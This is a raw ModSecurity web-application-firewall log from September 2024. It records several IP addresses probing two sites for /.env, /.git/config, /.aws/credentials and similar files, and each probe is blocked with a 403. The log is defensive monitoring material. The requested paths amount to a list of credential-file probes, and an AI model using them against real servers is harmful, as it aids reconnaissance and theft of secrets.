[Thu Sep 19 21:04:51.175102 2024] [:error] [pid 2048988] [client 159.89.12.166:46572] [client 159.89.12.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zux10ynGMA_vyF2guL_nDgAAAAY"]
[Thu Sep 19 21:04:51.230416 2024] [:error] [pid 2048990] [client 159.89.12.166:46586] [client 159.89.12.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zux10xtFXfZuh89PnED4XAAAAAo"]
[Thu Sep 19 21:04:51.231005 2024] [:error] [pid 2048990] [client 159.89.12.166:46586] [client 159.89.12.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zux10xtFXfZuh89PnED4XAAAAAo"]
[Thu Sep 19 21:04:51.231482 2024] [:error] [pid 2048990] [client 159.89.12.166:46586] [client 159.89.12.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zux10xtFXfZuh89PnED4XAAAAAo"]
[Thu Sep 19 21:04:51.285423 2024] [:error] [pid 2048985] [client 159.89.12.166:46590] [client 159.89.12.166] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zux1063TxxnUR0OWiD9r8gAAAAM"]
[Thu Sep 19 21:04:51.285943 2024] [:error] [pid 2048985] [client 159.89.12.166:46590] [client 159.89.12.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zux1063TxxnUR0OWiD9r8gAAAAM"]
[Thu Sep 19 21:04:51.286424 2024] [:error] [pid 2048985] [client 159.89.12.166:46590] [client 159.89.12.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zux1063TxxnUR0OWiD9r8gAAAAM"]
[Thu Sep 19 21:05:07.645118 2024] [:error] [pid 2048955] [client 179.43.168.130:46164] [client 179.43.168.130] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zux14-sNf7q_1-JBb3lZJgAAAAE"]
[Thu Sep 19 21:05:07.645522 2024] [:error] [pid 2048955] [client 179.43.168.130:46164] [client 179.43.168.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zux14-sNf7q_1-JBb3lZJgAAAAE"]
[Thu Sep 19 21:05:07.645845 2024] [:error] [pid 2048955] [client 179.43.168.130:46164] [client 179.43.168.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zux14-sNf7q_1-JBb3lZJgAAAAE"]
[Thu Sep 19 22:18:05.524984 2024] [:error] [pid 2048990] [client 179.43.149.114:34306] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZuyG_RtFXfZuh89PnED4YgAAAAo"]
[Thu Sep 19 22:18:05.525471 2024] [:error] [pid 2048990] [client 179.43.149.114:34306] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZuyG_RtFXfZuh89PnED4YgAAAAo"]
[Thu Sep 19 22:18:05.525815 2024] [:error] [pid 2048990] [client 179.43.149.114:34306] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZuyG_RtFXfZuh89PnED4YgAAAAo"]
[Thu Sep 19 22:18:05.587432 2024] [:error] [pid 2048985] [client 179.43.149.114:34318] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.exemple"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.exemple"] [unique_id "ZuyG_a3TxxnUR0OWiD9r-QAAAAM"]
[Thu Sep 19 22:18:05.587735 2024] [:error] [pid 2048985] [client 179.43.149.114:34318] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.exemple"] [unique_id "ZuyG_a3TxxnUR0OWiD9r-QAAAAM"]
[Thu Sep 19 22:18:05.587982 2024] [:error] [pid 2048985] [client 179.43.149.114:34318] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.exemple"] [unique_id "ZuyG_a3TxxnUR0OWiD9r-QAAAAM"]
[Thu Sep 19 22:18:05.655668 2024] [:error] [pid 2048991] [client 179.43.149.114:34332] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_exemple"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env_exemple"] [unique_id "ZuyG_WLhRMOmmPP8oZxPxAAAAAs"]
[Thu Sep 19 22:18:05.656163 2024] [:error] [pid 2048991] [client 179.43.149.114:34332] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env_exemple"] [unique_id "ZuyG_WLhRMOmmPP8oZxPxAAAAAs"]
[Thu Sep 19 22:18:05.656577 2024] [:error] [pid 2048991] [client 179.43.149.114:34332] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env_exemple"] [unique_id "ZuyG_WLhRMOmmPP8oZxPxAAAAAs"]
[Thu Sep 19 22:18:06.336653 2024] [:error] [pid 2048989] [client 179.43.149.114:34362] [client 179.43.149.114] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZuyG_pK4W9lpEOBrhR9DFgAAAAg"]
[Thu Sep 19 22:18:06.337193 2024] [:error] [pid 2048989] [client 179.43.149.114:34362] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZuyG_pK4W9lpEOBrhR9DFgAAAAg"]
[Thu Sep 19 22:18:06.337642 2024] [:error] [pid 2048989] [client 179.43.149.114:34362] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZuyG_pK4W9lpEOBrhR9DFgAAAAg"]
[Fri Sep 20 02:54:23.521939 2024] [:error] [pid 2051324] [client 45.200.148.16:33538] [client 45.200.148.16] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZuzHv2M_iMmX127RnoCIYwAAAAA"]
[Fri Sep 20 02:54:23.522659 2024] [:error] [pid 2051324] [client 45.200.148.16:33538] [client 45.200.148.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZuzHv2M_iMmX127RnoCIYwAAAAA"]
[Fri Sep 20 02:54:23.523109 2024] [:error] [pid 2051324] [client 45.200.148.16:33538] [client 45.200.148.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZuzHv2M_iMmX127RnoCIYwAAAAA"]
[Mon Sep 23 02:05:07.539975 2024] [:error] [pid 2119856] [client 45.148.10.172:34050] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvCws4M58o7gj4ItissPxgAAAAQ"]
[Mon Sep 23 02:05:07.541666 2024] [:error] [pid 2119856] [client 45.148.10.172:34050] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvCws4M58o7gj4ItissPxgAAAAQ"]
[Mon Sep 23 02:05:07.542143 2024] [:error] [pid 2119856] [client 45.148.10.172:34050] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvCws4M58o7gj4ItissPxgAAAAQ"]
[Mon Sep 23 02:05:07.836698 2024] [:error] [pid 2119855] [client 45.148.10.172:34060] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvCws57Orl3cr00lOKV4xwAAAAM"]
[Mon Sep 23 02:05:07.837339 2024] [:error] [pid 2119855] [client 45.148.10.172:34060] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvCws57Orl3cr00lOKV4xwAAAAM"]
[Mon Sep 23 02:05:07.837808 2024] [:error] [pid 2119855] [client 45.148.10.172:34060] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvCws57Orl3cr00lOKV4xwAAAAM"]
[Tue Sep 24 00:28:42.145470 2024] [:error] [pid 2142192] [client 45.148.10.172:36558] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvHrmk5YQYd5-PcPg82AlQAAAAo"]
[Tue Sep 24 00:28:42.145806 2024] [:error] [pid 2142192] [client 45.148.10.172:36558] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvHrmk5YQYd5-PcPg82AlQAAAAo"]
[Tue Sep 24 00:28:42.146032 2024] [:error] [pid 2142192] [client 45.148.10.172:36558] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvHrmk5YQYd5-PcPg82AlQAAAAo"]
[Wed Sep 25 08:05:23.745566 2024] [:error] [pid 2172414] [client 45.148.10.172:40740] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvOoI5QpRmZ1YFcARscEzAAAABU"]
[Wed Sep 25 08:05:23.747709 2024] [:error] [pid 2172414] [client 45.148.10.172:40740] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvOoI5QpRmZ1YFcARscEzAAAABU"]
[Wed Sep 25 08:05:23.748105 2024] [:error] [pid 2172414] [client 45.148.10.172:40740] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvOoI5QpRmZ1YFcARscEzAAAABU"]
[Thu Sep 26 06:22:39.749879 2024] [:error] [pid 2189421] [client 154.216.17.66:58904] [client 154.216.17.66] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZvThj6Yw75IOrj3BfwtpugAAAAA"]
[Thu Sep 26 06:22:39.750766 2024] [:error] [pid 2189421] [client 154.216.17.66:58904] [client 154.216.17.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZvThj6Yw75IOrj3BfwtpugAAAAA"]
[Thu Sep 26 06:22:39.751275 2024] [:error] [pid 2189421] [client 154.216.17.66:58904] [client 154.216.17.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZvThj6Yw75IOrj3BfwtpugAAAAA"]
